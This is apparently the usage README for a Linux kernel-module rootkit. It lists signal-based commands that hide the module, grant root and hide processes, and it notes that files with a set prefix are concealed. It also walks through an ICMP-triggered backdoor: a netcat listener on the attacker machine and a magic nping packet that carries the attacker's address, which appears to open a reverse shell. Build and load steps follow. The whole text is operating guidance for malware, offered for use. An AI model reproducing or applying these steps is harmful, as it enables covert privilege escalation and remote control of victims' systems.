Tested on Ubuntu 22.04 and Debian 12.4
Hide/Show rootkit in the list of loaded modules ($ lsmod
$ kill -63 1
When installed it starts hidden. You can only remove it when it's unhidden.
Become root:
$ kill -64 1
Hide process with pid
$ kill -62 <pid>
Unhide process with pid
$ kill -61 <pid>
It also hides every file and directory with prefix rootk_
On attacker machine start netcat listener on some port:
$ nc -lnvp <port>
Send ICMP ping to victim:
$ nping --icmp -c 1 -dest-ip <victim-ip> --data-string 'wA@2mC!dq <attacker-ip> <port>'
Compile module and backdoor:
$ make
$ make install
Load module:
$ sudo insmod build/rootkit.ko
Make sure the module is visible in lsmod
. To toggle visibility do kill -63 1
. Then, remove it with:
$ sudo rmmod rootkit.ko